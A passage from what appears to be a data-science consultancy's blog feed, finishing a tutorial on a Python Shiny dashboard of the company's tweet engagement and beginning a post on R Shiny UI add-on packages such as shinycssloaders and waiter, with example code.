&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# read data from file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#34;jr_shiny.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jr&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;astype({&lt;span style="color:#a5d6ff"&gt;&amp;#34;day&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;object&amp;#34;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;server&lt;/span&gt;(input, output, session):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@output&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@render.plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(): &lt;span style="color:#8b949e;font-style:italic"&gt;# function name matches the id=&amp;#34;plot&amp;#34; in the outputs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#8b949e;font-style:italic"&gt;# access input id=&amp;#34;x&amp;#34; value with input.x()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        avg_int &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jr&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;groupby(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;x(), as_index&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;agg(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            {&lt;span style="color:#a5d6ff"&gt;&amp;#34;retweet_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;mean&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;favorite_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;mean&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        avg_int &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;melt(avg_int, id_vars&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;x())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ggplot(avg_int, gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;aes(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;x(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;value&amp;#34;&lt;/span&gt;, fill&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;variable&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;geom_col(position&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;dodge&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylab(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Average Interactions&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;scale_fill_brewer(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;qual&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                palette&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Dark2&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Interaction&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                labels&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;([&lt;span style="color:#a5d6ff"&gt;&amp;#34;Like&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Retweet&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;theme_classic()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;x() &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;day&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;scale_x_discrete(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                labels&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;([&lt;span style="color:#a5d6ff"&gt;&amp;#34;Mon&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Tue&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Wed&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Thu&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Fri&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sat&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sun&amp;#34;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@output&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@render.text&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;text&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;cols() &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; () &lt;span style="color:#ff7b72;font-weight:bold"&gt;or&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;or&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;elif&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num() &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Displaying the most recent @jumping_uk tweet:&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Displaying the &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num()&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt; most recent @jumping_uk tweets:&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@output&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@render.table&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;table&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        cols &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jr&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;filter(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;cols())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        cols&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rename(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                &lt;span style="color:#a5d6ff"&gt;&amp;#34;created_at&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Date&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                &lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Text&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                &lt;span style="color:#a5d6ff"&gt;&amp;#34;retweet_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Retweets&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                &lt;span style="color:#a5d6ff"&gt;&amp;#34;favorite_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Likes&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            inplace&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;set_option(&lt;span style="color:#a5d6ff"&gt;&amp;#34;colheader_justify&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;left&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        first_n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cols&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;or&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;None&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; first_n
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="finishing-touches"&gt;Finishing Touches&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;App&lt;/code&gt; class allows us to define an object that contains both the UI content and the server function together.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; App
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; App(app_ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can then run our app. By default, the command line interface looks for an object called &amp;ldquo;app&amp;rdquo; to act as
the entrypoint, but a different object can be specified; see &lt;code&gt;shiny run --help&lt;/code&gt;.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;shiny run --reload app
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The &lt;code&gt;run&lt;/code&gt; command will preview our app, and &lt;code&gt;--reload&lt;/code&gt; will reload the app whenever we make changes to our code.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of the shiny dashboard showing a plot of average interactions per year, the most recent Tweet by Jumping Rivers and a user input box." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/dashboard_screenshot.png" width="1894"&gt;&lt;/p&gt;
&lt;h1 id="reflections"&gt;Reflections&lt;/h1&gt;
&lt;p&gt;The arrival of Shiny in Python will open up the framework to a whole new cohort of users, myself included! Whilst I found the basic concepts relatively straightforward to grasp, learning resources are pretty much limited to the &lt;a href="https://shiny.rstudio.com/py/api/" rel="external"&gt;API reference&lt;/a&gt;. Advancing past the core concepts may be more challenging, particularly (I imagine) for users with no experience of &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny for R&lt;/a&gt;, due to the lack of online reading material. We can also expect changes in the coming months, as &lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;Shiny for Python&lt;/a&gt; is currently in alpha. However, with Shiny being such a popular framework amongst R users, its expansion to Python is very exciting, and I look forward to seeing how it develops in the future.&lt;/p&gt;
&lt;p&gt;View the dashboard I created:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/jumpingrivers/blog-shiny-python-rtweet-dashboard" rel="external"&gt;Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://jumpingrivers.github.io/blog-shiny-python-rtweet-dashboard/" rel="external"&gt;Deployed application&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://github.com/jumpingrivers/blog-shiny-python-rtweet-dashboard/blob/main/app/jr_shiny.csv" rel="external"&gt;Download the data I used&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Top 5 Shiny UI Add-On Packages</title><link>https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/</link><pubDate>Thu, 27 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;There is a growing number of Shiny users across the world, and with
them comes an increasing number of open-source “add-on” packages
that extend the functionality of Shiny, both in terms of the front end
and the back end of an app.&lt;/p&gt;
&lt;p&gt;This blog will highlight 5 UI add-on packages that can massively improve
your user experience and also just add a bit of flair to your app. Each
package will have an associated example app (some more inspired than
others) that I’ve created where you can actually see the UI component in
action. All code for example apps can be found &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/" rel="external"&gt;on our
GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-shiny-extensions-ui"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="shinycssloaders"&gt;&lt;a href="https://github.com/daattali/shinycssloaders" rel="external"&gt;{shinycssloaders}&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;If you have graphs or other outputs in your app that are slow to render
and re-render, it can be frustrating for the user if it looks like
nothing is changing after they’ve changed an input or pressed a button
to re-render. Adding a spinner to indicate the plot is re-rendering
makes it clear to the user what is going on and can make that waiting
time a bit more bearable!&lt;/p&gt;
&lt;p&gt;While the {shinycssloaders} package does not speed up your plot
rendering (although if you &lt;em&gt;do&lt;/em&gt; need help with speeding up a Shiny app,
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/" rel="external"&gt;we can
help&lt;/a&gt;),
it does let you very easily add loading spinners to any specific output
in your Shiny app.&lt;/p&gt;
&lt;p&gt;All you need to do is wrap your Shiny output in the &lt;code&gt;withSpinner()&lt;/code&gt;
function! You can also modify the spinner with the &lt;code&gt;type&lt;/code&gt;, &lt;code&gt;color&lt;/code&gt;, and
&lt;code&gt;size&lt;/code&gt; arguments.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;withSpinner&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_plot&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In my example app:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of a plot being re-generated with a shinycssloader showing during rendering." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/gifs/shinycssloaders.gif" width="882"&gt;&lt;/p&gt;
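&lt;p&gt;To make the &lt;code&gt;type&lt;/code&gt;, &lt;code&gt;color&lt;/code&gt; and &lt;code&gt;size&lt;/code&gt; arguments concrete, here is a minimal sketch of a complete app (not the code behind the gif above). The output ID, the button and the two-second &lt;code&gt;Sys.sleep()&lt;/code&gt; that stands in for a slow plot are all made up for illustration.&lt;/p&gt;

```r
library("shiny")
library("shinycssloaders")

ui = fluidPage(
  actionButton("redraw", "Re-draw plot"),
  # wrap the output; type picks the spinner style (1 to 8),
  # color takes a hex code and size is a relative scale factor
  withSpinner(
    plotOutput("my_plot"),
    type = 6,
    color = "#5b3794",
    size = 1.5
  )
)

server = function(input, output, session) {
  output$my_plot = renderPlot({
    input$redraw  # depend on the button so that a click re-renders the plot
    Sys.sleep(2)  # stand-in for a slow computation (assumption)
    hist(rnorm(500), main = "A slow plot")
  })
}

shinyApp(ui, server)
```

&lt;p&gt;Clicking the button invalidates the plot, and the spinner should be shown in its place until the new plot is ready.&lt;/p&gt;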
&lt;h2 id="waiter"&gt;&lt;a href="https://github.com/JohnCoene/waiter" rel="external"&gt;{waiter}&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;{shinycssloaders} is very useful if you have one or more slow outputs
that need to be rendered or re-rendered, but what if just loading
your app at start-up is slow, for example because you’re pulling new data
from an API or a database every time the app loads? This is where the
{waiter} package comes in handy!&lt;/p&gt;
&lt;p&gt;{waiter} allows you to create a loading screen that covers the entire
app until some specific bit of code has finished running. You just need
to tell it when to show (&lt;code&gt;waiter_show()&lt;/code&gt;) and when to hide
(&lt;code&gt;waiter_hide()&lt;/code&gt;) the waiter loading screen. Note that you’ll need to
activate the waiter functionality by including the &lt;code&gt;useWaiter()&lt;/code&gt; command
in your UI.&lt;/p&gt;
&lt;p&gt;The basic syntax is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;useWaiter&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the server&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;waiter_show&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# code that takes a while to run&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;waiter_hide&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In my example app:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of an app being refreshed with a loading screen created by the waiter package." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/gifs/waiter.gif" width="831"&gt;&lt;/p&gt;
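&lt;p&gt;Put together, a minimal sketch of an app with a start-up loading screen might look like the following. The three-second &lt;code&gt;Sys.sleep()&lt;/code&gt; is a stand-in for a slow data pull, the output ID is a placeholder, and &lt;code&gt;spin_fading_circles()&lt;/code&gt; is just one of the spinners that ship with {waiter}.&lt;/p&gt;

```r
library("shiny")
library("waiter")

ui = fluidPage(
  useWaiter(), # load the waiter dependencies
  h2("Dashboard"),
  tableOutput("head")
)

server = function(input, output, session) {
  # cover the whole page while the slow start-up code runs
  waiter_show(html = spin_fading_circles())

  Sys.sleep(3) # stand-in for pulling data from an API or database (assumption)
  dat = head(mtcars)

  output$head = renderTable(dat)

  # reveal the app once everything is ready
  waiter_hide()
}

shinyApp(ui, server)
```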
